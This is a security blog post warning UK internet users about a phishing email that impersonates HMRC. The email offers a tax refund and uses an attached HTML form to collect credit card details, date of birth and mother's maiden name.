Phishers exploit HMRC tax error refund in UK

Filed Under: Phishing, Spam

HMRC logo
Tax authorities in the UK are contacting millions of people, telling them that they have paid the wrong amount of tax.

As the BBC reports, the mistakes in tax payment calculations have been uncovered following the introduction of a new computer system.

So, it's good news for some (who will be receiving an unexpected windfall in the form of a tax rebate) and bad news for others, who will find that they are being asked to make uncomfortable additional payments to the HMRC.

But if you think you had enough to worry about with the possibility of an unexpected extra tax demand, UK internet users are also at risk as scammers exploit the confusion.

For instance, here's a message we caught in our spam traps this morning which claimed to come from HMRC with the subject line "You Have An HMRC Refund":

Bogus HMRC refund email

Part of the email reads:

Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the past years, our calculations show you have made over payments of 317.66GBP

Due to the high volume of refunds you must complete the online application.

Your refund may take up to 6 weeks to process please make sure you complete the form correctly.

In order to process your refund you will need to complete the attached application form.

Attached to the email is a file called Refund-Form.zip, which contains an HTML file called Refund-Form.htm which asks for information including your credit card details, full date of birth, and mother's maiden name.

Phishing form

If you do make the mistake of filling in the form, your confidential data is uploaded to a Chinese server. You're not going to receive a windfall because of this form - you've just been phished.

The real HMRC website contains advice about scams like this, and clearly states that they would never customers of a tax rebate via email, or invite them to complete an online form to receive a rebate of tax.

You have been warned - don't let your eagerness for a tax refund lead to you throwing caution to the wind.

, ,

You might like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About the author

Graham Cluley is an award-winning security blogger, and veteran of the anti-virus industry having worked for a number of security companies since the early 1990s. Now an independent security analyst, he regularly makes media appearances and gives computer security presentations. Send Graham an email, subscribe to his updates on Facebook, follow him on Twitter and App.net, and circle him on Google Plus for regular updates.